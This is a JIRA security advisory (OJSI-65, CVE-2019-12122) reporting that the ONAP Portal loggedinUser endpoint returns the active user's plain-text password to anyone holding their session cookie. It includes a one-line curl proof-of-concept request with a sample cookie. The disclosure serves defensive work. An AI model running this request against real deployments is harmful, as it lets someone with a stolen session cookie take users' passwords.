Uploaded image for project: 'ONAP JIRA Security Issues'
  1. ONAP JIRA Security Issues
  2. OJSI-65

ONAP Portal allows to retrieve password of currently active user (CVE-2019-12122)

    Details

    • OJSI CVE:
      CVE-2019-12122
    • OJSI Impact Description:
      Hide

      Title: ONAP Portal allows to retrieve password of currently active user

      Reporter: Krzysztof Opasiak from Samsung

      Products: Portal

      Affects: Dublin and earlier

      Description:

      Krzysztof Opasiak from Samsung reported a vulnerability in Portal. By executing a call to ONAPPORTAL/portalApi/loggedinUser an attacker who posses user's cookie may retrieve user's password from the database. All Portal setups are affected.

      Show
      Title: ONAP Portal allows to retrieve password of currently active user Reporter: Krzysztof Opasiak from Samsung Products: Portal Affects: Dublin and earlier Description: Krzysztof Opasiak from Samsung reported a vulnerability in Portal. By executing a call to ONAPPORTAL/portalApi/loggedinUser an attacker who posses user's cookie may retrieve user's password from the database. All Portal setups are affected.
    • OJSI Grant Project Access:
      OJSI-PORTAL

      Description

      ONAP Portal allows to retrieve user password based on SESSION value stored in
      Cookie. Call to ONAPPORTAL/portalApi/loggedinUser, which is used to retrieve details
      about active user, returns not only email addresses and personal data but also password
      in plain text. Command below allows to retrieve password of active user
      based on session id.

      curl -k -i -H ’Accept: application/json’ -H ’Cookie: SESSION=YWNmM2IwNTZ+ZTkzOH40NTM2fmI1MGZ+YTIxMGY3MWZlMDBi’ -X GET https://<IP addr>:30225/ONAPPORTAL/portalApi/loggedinUser

       

       

        Attachments

        No reviews matched the request. Check your Options in the drop-down menu of this sections header.

          Activity

            People

            • Assignee:
              talasila Manoop Talasila
              Reporter:
              kopasiak Krzysztof Opasiak
              OJSI Grant Person Access:
              Robert Bogacki
              OJSI Grant Person2 Access:
              Jim Baker
            • Votes:
              0 Vote for this issue
              Watchers:
              3 Start watching this issue

              Dates

              • Created:
                Updated:
                Resolved: